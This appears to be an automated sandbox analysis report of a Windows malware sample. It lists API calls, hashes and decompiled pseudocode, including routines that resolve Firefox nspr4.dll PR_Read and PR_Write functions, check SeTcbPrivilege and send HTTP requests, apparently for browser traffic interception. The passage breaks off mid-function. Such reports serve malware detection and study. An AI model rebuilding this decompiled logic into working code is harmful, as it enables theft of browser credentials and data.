0x0040b5f0
0x0040b5f4
0x0040b5f9
0x0040b5fd
0x0040b675
0x00000000
0x0040b5ff
0x0040b5ff
0x0040b60a
0x0040b60f
0x0040b612
0x0040b614
0x0040b678
0x0040b678
0x0040b616
0x0040b619
0x0040b620
0x0040b625
0x0040b62c
0x0040b62f
0x0040b638
0x0040b638
0x0040b614
0x0040b680
0x0040b685
0x0040b688
0x0040b690
0x0040b692
0x00000000
0x0040b694
0x0040b694
0x0040b694
0x0040b68a
0x0040b68a
0x0040b68a
0x0040b688
0x0040b4d8
0x0040b4df
0x0040b4eb
0x0040b4fb
0x0040b501
0x0040b503
0x0040b506
0x0040b514
0x0040b516
0x0040b519
0x00000000
0x0040b51f
0x0040b51f
0x00000000
0x0040b51f
0x0040b508
0x0040b508
0x0040b521
0x0040b524
0x0040b526
0x0040b540
0x0040b542
0x0040b545
0x0040b63f
0x0040b640
0x00000000
0x0040b54b
0x0040b552
0x0040b556
0x0040b558
0x0040b55e
0x0040b563
0x0040b56d
0x0040b56d
0x0040b56f
0x00000000
0x0040b575
0x0040b575
0x0040b582
0x0040b58e
0x0040b590
0x00000000
0x0040b592
0x0040b59e
0x0040b5a0
0x0040b5a2
0x0040b645
0x0040b645
0x0040b648
0x0040b5a8
0x0040b5b0
0x0040b5b6
0x0040b5b8
0x00000000
0x0040b5be
0x0040b5bf
0x0040b5c4
0x0040b5c7
0x0040b5cb
0x0040b5cd
0x00000000
0x0040b5cd
0x0040b5b8
0x0040b5a2
0x0040b577
0x0040b577
0x0040b57c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b57c
0x0040b575
0x0040b565
0x0040b565
0x0040b567
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b567
0x0040b563
0x0040b545
0x0040b506
0x0040b654
0x0040b65a
0x0040b65a
0x0040b4ca
0x0040b669
0x0040b66e
0x0040b3e9
0x0040b3eb
0x0040b3eb
0x0040b3ed
0x0040b3fa

APIs

Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000003C0,?,?,00000102), ref: 0040B501
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 0040B53A
CloseHandle.KERNEL32(00000000,00000000), ref: 0040B558
lstrcmpiW.KERNEL32(?,?), ref: 0040B588

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

p*B, xrefs: 0040B50E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID: p*B
API String ID: 503543330-1544117718
Opcode ID: 056f82d34aff28ca028f2a022eeb68c07da50eb6aeda69f8d491d49d341cbed6
Instruction ID: bbb6fb77884f24ea0f7cb2fe9583bd22383439c6261d9df05538de9bdb08ad0d
Opcode Fuzzy Hash: 056f82d34aff28ca028f2a022eeb68c07da50eb6aeda69f8d491d49d341cbed6
Instruction Fuzzy Hash: 6771BE71508341ABC320DF64C885AAFB7E8EF81714F140A3EF995A62E1D739D945878E

Uniqueness

Uniqueness Score: -1.00%

Function 004051AB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004051AB(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				char _v92;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				void* _t25;
				long _t27;
				void* _t28;
				long _t29;
				void* _t33;
				void* _t39;
				void* _t41;
				void* _t44;
				long _t49;
				void* _t50;
				void* _t57;
				void* _t62;
				void* _t69;
				void* _t73;
				WCHAR* _t77;
				void* _t78;
				void* _t80;
				void* _t82;

				_t73 = __edx;
				_t70 = __ecx;
				_t22 = E0040634D(__ecx, __eflags, 0x743c1521, 2);
				_v28 = _t22;
				if(_t22 != 0) {
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t25 = E00406473();
					__eflags = _t25;
					if(_t25 == 0) {
						L24:
						E00415194(_v28);
						__eflags = 0;
						return 0;
					}
					_t27 = WaitForSingleObject( *0x4229f4, 0xea60);
					__eflags = _t27 - 0x102;
					if(_t27 != 0x102) {
						goto L24;
					}
					do {
						_t28 = E00419E1D(_t70);
						_v24 = _t28;
						__eflags = _t28;
						if(__eflags == 0) {
							goto L22;
						}
						_t80 = E0041752D( &_v16, _t73, __eflags, _t28, 2, 0x20000000);
						_v20 = _t80;
						__eflags = _t80;
						if(__eflags == 0) {
							L21:
							E004119C1(_v20);
							E004119C1(_v24);
							goto L22;
						}
						_t70 = _v16;
						_t33 = E00404C40(_v16, __eflags, _t80);
						__eflags = _t33;
						if(_t33 == 0) {
							goto L21;
						} else {
							goto L8;
						}
						do {
							L8:
							_v8 = E00412891(_t80, 1);
							_v12 = E00412891(_t80, 2);
							_t39 = E00412D70(_t80, E004124FE(_t80));
							_t72 = _v8;
							_t41 = E00412D70(_t72, E004124FE(_v8));
							_t70 = _v12;
							_push(E00412D70(_t70, E004124FE(_v12)));
							_push(_t41);
							_push(_t39);
							_push(L"Global\\%08X%08X%08X");
							_t73 = 0x20;
							_t77 =  &_v92;
							_t44 = E004126B4(_t43, _t73, _t77);
							_t82 = _t82 + 0x10;
							__eflags = _t44 - 0x1f;
							if(_t44 != 0x1f) {
								goto L20;
							}
							_t69 = CreateMutexW(0x422568, 1, _t77);
							__eflags = _t69;
							if(_t69 == 0) {
								goto L20;
							}
							_t49 = GetLastError();
							__eflags = _t49 - 0xb7;
							if(_t49 == 0xb7) {
								CloseHandle(_t69);
								_t69 = 0;
								__eflags = 0;
							}
							__eflags = _t69;
							if(_t69 != 0) {
								_t50 = 0x10;
								_t78 = E00411991(_t50);
								__eflags = _t78;
								if(_t78 == 0) {
									L19:
									E00415194(_t69);
									goto L20;
								}
								 *_t78 = E00411E1F(_t51 | 0xffffffff, _t80);
								 *(_t78 + 4) = E00411E1F(_t53 | 0xffffffff, _v8);
								_t57 = E00411E1F(_t55 | 0xffffffff, _v12);
								__eflags =  *_t78;
								 *(_t78 + 8) = _t57;
								 *(_t78 + 0xc) = _t69;
								if( *_t78 == 0) {
									L18:
									E004119C1( *_t78);
									E004119C1( *(_t78 + 4));
									E004119C1( *(_t78 + 8));
									E004119C1(_t78);
									goto L19;
								}
								__eflags =  *(_t78 + 4);
								if( *(_t78 + 4) == 0) {
									goto L18;
								}
								__eflags = _t57;
								if(_t57 == 0) {
									goto L18;
								}
								_t62 = E004133F6(0x80000, E00404F00, _t78);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L20;
								}
								goto L18;
							}
							L20:
							_t80 = E00412891(_t80, 3);
							__eflags = _t80;
						} while (_t80 != 0);
						goto L21;
						L22:
						_t29 = WaitForSingleObject( *0x4229f4, 0xea60);
						__eflags = _t29 - 0x102;
					} while (_t29 == 0x102);
					goto L24;
				}
				return _t22 + 1;
			}

0x004051ab
0x004051ab
0x004051b8
0x004051bd
0x004051c2
0x004051d3
0x004051d9
0x004051de
0x004051e0
0x0040539e
0x004053a1
0x004053a6
0x00000000
0x004053a6
0x004051f1
0x004051f7
0x004051fc
0x00000000
0x00000000
0x00405205
0x00405205
0x0040520a
0x0040520d
0x0040520f
0x00000000
0x00000000
0x00405225
0x00405227
0x0040522a
0x0040522c
0x0040536f
0x00405372
0x0040537a
0x00000000
0x0040537a
0x00405232
0x00405236
0x0040523b
0x0040523d
0x00000000
0x00000000
0x00000000
0x00000000
0x00405243
0x00405243
0x0040524c
0x0040525a
0x00405264
0x00405269
0x00405275
0x0040527a
0x0040528b
0x0040528c
0x0040528d
0x0040528e
0x00405295
0x00405296
0x00405299
0x0040529e
0x004052a1
0x004052a4
0x00000000
0x00000000
0x004052ba
0x004052bc
0x004052be
0x00000000
0x00000000
0x004052c4
0x004052ca
0x004052cf
0x004052d2
0x004052d8
0x004052d8
0x004052d8
0x004052da
0x004052dc
0x004052e0
0x004052e6
0x004052e8
0x004052ea
0x00405356
0x00405357
0x00000000
0x00405357
0x004052f8
0x00405305
0x0040530b
0x00405310
0x00405313
0x00405316
0x00405319
0x00405339
0x0040533b
0x00405343
0x0040534b
0x00405351
0x00000000
0x00405351
0x0040531b
0x0040531f
0x00000000
0x00000000
0x00405321
0x00405323
0x00000000
0x00000000
0x00405330
0x00405335
0x00405337
0x00000000
0x00000000
0x00000000
0x00405337
0x0040535c
0x00405365
0x00405367
0x00405367
0x00000000
0x0040537f
0x0040538a
0x00405390
0x00405390
0x00000000
0x0040539d
0x00000000

APIs

Part of subcall function 0040634D: CreateMutexW.KERNEL32(00422568,00000000,?,?,?,?,?), ref: 0040636E

GetCurrentThread.KERNEL32 ref: 004051CC
SetThreadPriority.KERNEL32(00000000), ref: 004051D3
WaitForSingleObject.KERNEL32(0000EA60), ref: 004051F1
CreateMutexW.KERNEL32(00422568,00000001,?,20000000), ref: 004052B4
GetLastError.KERNEL32 ref: 004052C4
CloseHandle.KERNEL32(00000000), ref: 004052D2

Strings

Global\%08X%08X%08X, xrefs: 0040528E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMutexThread$CloseCurrentErrorHandleLastObjectPrioritySingleWait
String ID: Global\%08X%08X%08X
API String ID: 3448221409-3239447729
Opcode ID: b797ca54c87a9714b055ca159847229bec48e52bdda72b341665097598410841
Instruction ID: ee61de3a0adadf53f9f8b42730de25b573b55bc7201569590c8ca3ffbffe1920
Opcode Fuzzy Hash: b797ca54c87a9714b055ca159847229bec48e52bdda72b341665097598410841
Instruction Fuzzy Hash: 4941F4B1A00B05BADB117BB59D46BAF7665EF40754F14053BFA10F62E2CBBC8C908A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C50A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041C50A(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t30;
				_Unknown_base(*)()* _t42;
				intOrPtr _t44;
				intOrPtr _t50;
				intOrPtr* _t55;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;
				CHAR* _t61;
				CHAR* _t62;
				CHAR* _t63;
				_Unknown_base(*)()* _t64;
				WCHAR* _t66;
				void* _t68;

				_t58 = __ecx;
				_t66 =  &_v112;
				E00419DD3(0xdd, _t66);
				_t30 = LoadLibraryW(_t66);
				_v8 = _t30;
				if(_t30 == 0) {
					return _t30;
				}
				_t61 =  &_v84;
				E00419D9D(0xde, _t61);
				_t55 = GetProcAddress(_v8, _t61);
				_t62 =  &_v40;
				E00419D9D(0xdf, _t62);
				_v20 = GetProcAddress(_v8, _t62);
				_t63 =  &_v60;
				E00419D9D(0xe0, _t63);
				_t42 = GetProcAddress(_v8, _t63);
				_t68 = 0;
				_t64 = _t42;
				if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
					L14:
					return FreeLibrary(_v8);
				} else {
					_t44 = E0041308D(L"SeTcbPrivilege");
					__imp__WTSGetActiveConsoleSessionId();
					_v24 = _t44;
					if(_t44 != 0xffffffff) {
						E0041C499(_t58, 0, _t64, _t44, _a4, _a8);
					}
					_push( &_v12);
					_push( &_v16);
					_push(1);
					_push(_t68);
					_push(_t68);
					if( *_t55() == 0) {
						goto L14;
					} else {
						_t57 = 0;
						if(_v12 <= _t68) {
							L13:
							_v20(_v16);
							goto L14;
						} else {
							goto L8;
						}
						do {
							L8:
							_t59 = _t68 + _v16;
							_t50 =  *((intOrPtr*)(_t59 + 8));
							if(_t50 == 0 || _t50 == 4) {
								_t51 =  *_t59;
								if( *_t59 != _v24) {
									E0041C499(_t59, _t68, _t64, _t51, _a4, _a8);
								}
							}
							_t57 = _t57 + 1;
							_t68 = _t68 + 0xc;
						} while (_t57 < _v12);
						goto L13;
					}
				}
			}

0x0041c50a
0x0041c511
0x0041c519
0x0041c521
0x0041c527
0x0041c52c
0x0041c60f
0x0041c60f
0x0041c534
0x0041c53c
0x0041c54f
0x0041c551
0x0041c559
0x0041c566
0x0041c569
0x0041c571
0x0041c57c
0x0041c57e
0x0041c580
0x0041c584
0x0041c602
0x00000000
0x0041c58f
0x0041c594
0x0041c599
0x0041c59f
0x0041c5a5
0x0041c5af
0x0041c5af
0x0041c5b7
0x0041c5bb
0x0041c5bc
0x0041c5be
0x0041c5bf
0x0041c5c4
0x00000000
0x0041c5c6
0x0041c5c6
0x0041c5cb
0x0041c5fc
0x0041c5ff
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c5cd
0x0041c5cd
0x0041c5d0
0x0041c5d3
0x0041c5d8
0x0041c5df
0x0041c5e4
0x0041c5ee
0x0041c5ee
0x0041c5e4
0x0041c5f3
0x0041c5f4
0x0041c5f7
0x00000000
0x0041c5cd
0x0041c5c4

APIs

LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?), ref: 0041C521
GetProcAddress.KERNEL32(?,?), ref: 0041C54D
GetProcAddress.KERNEL32(?,?), ref: 0041C564
GetProcAddress.KERNEL32(?,?), ref: 0041C57C
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?,00000000), ref: 0041C605

Part of subcall function 0041308D: GetCurrentThread.KERNEL32 ref: 0041309D
Part of subcall function 0041308D: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
Part of subcall function 0041308D: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6

WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,0041CEA0,?,?,00000000), ref: 0041C599

Part of subcall function 0041C499: EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4BE
Part of subcall function 0041C499: CloseHandle.KERNEL32(?,?,00000000,?,0041C5F3,00000000,?,?,?), ref: 0041C4FF

Strings

.exe, xrefs: 0041C533
SeTcbPrivilege, xrefs: 0041C58F

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
String ID: .exe$SeTcbPrivilege
API String ID: 1107370034-552748125
Opcode ID: 348e5b6bfaf3258e08e439ddfca0e840065b991221becb6e8d7961f8007bc020
Instruction ID: a7d43c2a83ef8a622bcc1519f4963d1dceded52f62e05d5ef1c558f6f218f66b
Opcode Fuzzy Hash: 348e5b6bfaf3258e08e439ddfca0e840065b991221becb6e8d7961f8007bc020
Instruction Fuzzy Hash: 24319E35A00128BBDF11ABA5DC859EEBB79EF48304F140027F801F6250C779AE80CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405DDE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DDE(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x424010);
				 *0x424004 = 0;
				 *0x42400c = 0;
				 *0x424008 = 0;
				 *0x423e74 = 0;
				 *0x423c8c = 0;
				 *0x423c84 = 0;
				 *0x423c88 = 0;
				InitializeCriticalSection(0x423c6c);
				_t42 =  &_v532;
				E0040666E(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0041B442( &_v532);
				E0040733E( &_v532);
				 *0x422a4c = 0;
				 *0x422a68 = 0;
				InitializeCriticalSection(0x422a50);
				E0041AB48(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E00419A5A(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x422a48 =  *0x422a48 | 0x00000001;
				}
				E00419823();
				return 1;
			}

0x00405dde
0x00405dde
0x00405df5
0x00405e00
0x00405e06
0x00405e0c
0x00405e12
0x00405e18
0x00405e1e
0x00405e24
0x00405e2a
0x00405e2d
0x00405e33
0x00405e38
0x00405e4b
0x00405e58
0x00405e5d
0x00405e77
0x00405e7c
0x00405e7c
0x00405e80
0x00405e80
0x00405e86
0x00405e8c
0x00405e92
0x00405e92
0x00405e98
0x00405ea6
0x00405eb1
0x00405ebb
0x00405ec1
0x00405ec7
0x00405ec9
0x00405edb
0x00405ee6
0x00405edd
0x00405edf
0x00405edf
0x00405eea
0x00405eec
0x00405eec
0x00405ef3
0x00405efe

APIs

InitializeCriticalSection.KERNEL32(00424010,00000000,75144EE0,00000000), ref: 00405DF5
InitializeCriticalSection.KERNEL32(00423C6C), ref: 00405E2A

Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00405E52
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00405E6F
CloseHandle.KERNEL32(00000000), ref: 00405E80
InitializeCriticalSection.KERNEL32(00422A50), ref: 00405EC7
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00405ED3

Strings

nspr4.dll, xrefs: 00405ECE

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: nspr4.dll
API String ID: 1155594396-741017701
Opcode ID: d29a6554a3e0eaa30e0a8dd9eb70e05daf081a764cc1f17d3c63ea90e9f2ed76
Instruction ID: a71a5b26871d3e3324adec9d0cb20ef8ba2cc99f634e81acd0de4dc19795af69
Opcode Fuzzy Hash: d29a6554a3e0eaa30e0a8dd9eb70e05daf081a764cc1f17d3c63ea90e9f2ed76
Instruction Fuzzy Hash: 83319131A40208AAD720AF69ED85A9E7BB8EB44314F50057FE515F22E0D6784F868F98

Uniqueness

Uniqueness Score: -1.00%

Function 004136A9, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004136A9(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x422388, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x004136b0
0x004136b4
0x004136b9
0x004136bb
0x004136bb
0x004136c4
0x004136c6
0x004136c6
0x004136cf
0x004136d4
0x004136d6
0x004136d6
0x004136f7
0x004136fb
0x0041375b
0x00000000
0x004136fd
0x004136ff
0x00413707
0x00413709
0x0041370e
0x00413701
0x00413701
0x00413703
0x00413720
0x00413754
0x00413755
0x00000000
0x00413722
0x00413722
0x00413736
0x00413745
0x00000000
0x00413750
0x00000000
0x00413750
0x00413745
0x00413720

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,00422388,8404F700,00000000), ref: 004136F1
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00413718
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0041373D
InternetCloseHandle.WININET(00000000), ref: 00413755

Strings

HTTP/1.1, xrefs: 004136E5
GET, xrefs: 004136D6, 004136ED
Connection: close, xrefs: 00413709, 00413716
POST, xrefs: 004136CF

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST
API String ID: 3080274660-1621676011
Opcode ID: 697284514f0cbda9bab7aceec8b234b908501337a057423e04b85b484785ea8a
Instruction ID: be86e865f83e421b307636e8b1c28f4dc15ebd08fecf420eabd819dadbd0a758
Opcode Fuzzy Hash: 697284514f0cbda9bab7aceec8b234b908501337a057423e04b85b484785ea8a
Instruction Fuzzy Hash: 8B11D3B12002097BEB258F548C45FE73A9CAB14746F108026FE01EA2E0D7B9DB9487EC

Uniqueness

Uniqueness Score: -1.00%

Function 00419A5A, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00419A5A(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x422348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x422358 = GetProcAddress(__edi, "PR_Close");
				 *0x422368 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x422348);
				_t9 = 4;
				 *0x422378 = _t4;
				_t10 = E00419792(_t9, _t11, _t12);
				if(_t10 != 0) {
					E004073F7(__edi,  *0x422350,  *0x422360,  *0x422370,  *0x422380);
				}
				return _t10;
			}

0x00419a5a
0x00419a5a
0x00419a70
0x00419a7d
0x00419a8a
0x00419a8f
0x00419a91
0x00419a98
0x00419a99
0x00419aa3
0x00419aa7
0x00419ac3
0x00419ac3
0x00419acc

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00419A68
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00419A75
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00419A82
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00419A8F

Part of subcall function 00419792: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,00000000,77A19EB0,?,?,00419A58,00422008,00000000,00405EF8), ref: 004197C9

Part of subcall function 004073F7: InitializeCriticalSection.KERNEL32(00422A08,75144EE0,00419AC8,00422348), ref: 0040740D
Part of subcall function 004073F7: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407449
Part of subcall function 004073F7: GetProcAddress.KERNEL32(PR_SetError), ref: 0040745B
Part of subcall function 004073F7: GetProcAddress.KERNEL32(PR_GetError), ref: 0040746D

Strings

PR_Close, xrefs: 00419A6A
PR_Write, xrefs: 00419A84
PR_Read, xrefs: 00419A77
PR_OpenTCPSocket, xrefs: 00419A62

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 7f30f8fd0cb29c9c797ad9e7429eb4daca6c8da34ec980934206e59010315a5c
Instruction ID: 2957d938e739e937d3a346bfc973f1a0bccafc9e1fe7d701533809f1fcd982a2
Opcode Fuzzy Hash: 7f30f8fd0cb29c9c797ad9e7429eb4daca6c8da34ec980934206e59010315a5c
Instruction Fuzzy Hash: 21F09072B803507ACB20BF766D45E527FACBB49B60394007BF900A71B0D6FD8482DA0C

Uniqueness

Uniqueness Score: -1.00%

Function 00407BE6, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00407BE6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v20;
				void* _v24;
				void* _v28;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				void* _v72;
				void* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t99;
				signed int _t100;
				signed int _t101;
				intOrPtr _t103;
				void* _t104;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				intOrPtr _t119;
				void* _t131;
				signed int _t139;
				void* _t149;
				struct _CRITICAL_SECTION* _t153;
				intOrPtr _t155;
				signed int _t168;
				signed int _t174;
				char _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t182;
				signed int _t183;
				intOrPtr _t186;
				void* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				signed int _t195;
				void* _t197;
				void* _t199;

				_t197 = (_t195 & 0xfffffff8) - 0x34;
				_t99 = E00406473();
				_t179 = _a4;
				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
					L40:
					_t100 =  *0x422a2c(_t179, _a8, _a12);
					goto L41;
				} else {
					_t153 = 0x422a08;
					EnterCriticalSection(0x422a08);
					_t101 = E00406F84(_t179);
					if(_t101 == 0xffffffff) {
						L39:
						LeaveCriticalSection(_t153);
						goto L40;
					}
					_t103 = _t101 * 0x38 +  *0x422a24;
					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
						L32:
						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
						_t85 = _t103 + 0x2c; // -4336120
						_t173 = _t85;
						__eflags = _a12 - _t182;
						_t183 =  <  ? _a12 : _t182;
						_t104 = E004119FD(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
							E00411A74(E004119C1( *_t173), _t173, 0, 0xc);
						}
						LeaveCriticalSection(_t153);
						_t100 = _t183;
						L41:
						return _t100;
					}
					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
						goto L39;
					}
					LeaveCriticalSection(0x422a08);
					_t107 =  *0x422a2c(_t179, _a8, _a12);
					_t199 = _t197 + 0xc;
					_v52 = _t107;
					if(_t107 <= 0xffffffff) {
						L38:
						_t100 = _v52;
						goto L41;
					}
					EnterCriticalSection(0x422a08);
					_t108 = E00406F84(_t179);
					_t174 = _t108;
					if(_t174 == 0xffffffff) {
						L35:
						_push(8);
						_push(0xffffe890);
						L36:
						 *0x422a04();
						_v52 = _v52 | 0xffffffff;
						L37:
						LeaveCriticalSection(_t153);
						goto L38;
					}
					_t168 = _v52;
					if(_t168 == 0) {
						L11:
						_t176 = _t174 * 0x38 +  *0x422a24;
